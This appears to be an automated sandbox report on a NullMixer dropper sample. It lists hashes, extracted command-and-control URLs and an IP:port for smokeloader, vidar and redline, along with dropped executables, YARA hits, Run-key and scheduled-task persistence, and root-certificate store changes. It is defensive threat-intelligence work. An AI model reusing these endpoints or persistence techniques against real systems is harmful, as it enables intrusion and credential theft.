nullmixer | 82e531dd4163ca5716a8b2f3feb188fc7fdbf8cac0270aa76664925fdd5124e2

Analysis

max time kernel
70s
max time network
174s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
07-01-2024 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48ad5d8112df0d5b74f71fd25ccd4e18.exe
Size

3.9MB
MD5

48ad5d8112df0d5b74f71fd25ccd4e18
SHA1

ca1d0832be94feac8d1441efcaa333886e8ce835
SHA256

82e531dd4163ca5716a8b2f3feb188fc7fdbf8cac0270aa76664925fdd5124e2
SHA512

37c55236155ea93f94129f9211f392329302b764c93ae722acbaec452464019dab8635e2e9a0d8c6e4d6b5add0f902c58bdfa691d45c62b42eb05f8056bbe3c4
SSDEEP

49152:xcB7EwJ84vLRaBtIl9mVhKi/98J/94r0VwTsrZM3bDHIxbQSdXL5F6q7Q6i4cgKT:x1CvLUBsgcM4/94rGY3PHa3/rKgKg2T

Malware Config

Extracted

Family

nullmixer

http://watira.xyz/

Extracted

Family

smokeloader

Botnet

pub5

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Build1

45.142.213.135:30058

Signatures

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/2012-448-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/2012-448-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/3008-152-0x0000000003120000-0x00000000031BD000-memory.dmp	family_vidar
behavioral1/memory/3008-173-0x0000000000400000-0x0000000002CCE000-memory.dmp	family_vidar

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/2800-1040-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2800-1063-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

ASPack v2.12-2.42 4 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x00070000000162a6-32.dat	aspack_v212_v242
behavioral1/files/0x00070000000162a6-31.dat	aspack_v212_v242
behavioral1/files/0x0009000000012270-28.dat	aspack_v212_v242
behavioral1/files/0x0009000000015dd6-26.dat	aspack_v212_v242

Executes dropped EXE 18 IoCs

pid	Process
2476	setup_install.exe
2612	53d58f3832.exe
556	27e380c23ad33.exe
2884	95714f41791.exe
984	731da7284717.exe
2836	81edfb0db828.exe
1868	0b0f89497d35095.exe
1952	7da174d16d4.exe
3008	cb3f07883441a5d6.exe
1064	0035b9e6fdaf9.exe
584	731da7284717.exe
3056	1cr.exe
1164	chrome2.exe
996	setup.exe
868	winnetdriv.exe
3016	services64.exe
2012	1cr.exe
2572	BUILD1~1.EXE

Loads dropped DLL 58 IoCs

pid	Process
2432	48ad5d8112df0d5b74f71fd25ccd4e18.exe
2432	48ad5d8112df0d5b74f71fd25ccd4e18.exe
2432	48ad5d8112df0d5b74f71fd25ccd4e18.exe
2476	setup_install.exe
2476	setup_install.exe
2476	setup_install.exe
2476	setup_install.exe
2476	setup_install.exe
2476	setup_install.exe
2476	setup_install.exe
2476	setup_install.exe
2628	cmd.exe
2628	cmd.exe
1916	cmd.exe
2696	cmd.exe
2356	cmd.exe
2356	cmd.exe
2612	53d58f3832.exe
2612	53d58f3832.exe
984	731da7284717.exe
984	731da7284717.exe
2752	cmd.exe
2520	cmd.exe
2684	cmd.exe
2684	cmd.exe
2652	cmd.exe
2224	cmd.exe
1868	0b0f89497d35095.exe
1868	0b0f89497d35095.exe
3008	cb3f07883441a5d6.exe
3008	cb3f07883441a5d6.exe
984	731da7284717.exe
1952	7da174d16d4.exe
1952	7da174d16d4.exe
584	731da7284717.exe
584	731da7284717.exe
3056	1cr.exe
3056	1cr.exe
1500	WerFault.exe
1500	WerFault.exe
1500	WerFault.exe
1868	0b0f89497d35095.exe
1500	WerFault.exe
1868	0b0f89497d35095.exe
996	setup.exe
2564	WerFault.exe
2564	WerFault.exe
2564	WerFault.exe
2564	WerFault.exe
2564	WerFault.exe
2564	WerFault.exe
2564	WerFault.exe
1164	chrome2.exe
3056	1cr.exe
2572	BUILD1~1.EXE
2572	BUILD1~1.EXE
2012	1cr.exe
2012	1cr.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	0035b9e6fdaf9.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ipinfo.io
8	ipinfo.io
32	api.db-ip.com
33	api.db-ip.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3056 set thread context of 2012	3056	1cr.exe	66

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1500	2476	WerFault.exe	27
2564	3008	WerFault.exe	39

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	53d58f3832.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	53d58f3832.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	53d58f3832.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1292	schtasks.exe
2156	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1853AB71-AD44-11EE-9F1C-6E556AB52A45} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	7da174d16d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	7da174d16d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	27e380c23ad33.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	81edfb0db828.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	81edfb0db828.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	27e380c23ad33.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	27e380c23ad33.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	27e380c23ad33.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	27e380c23ad33.exe
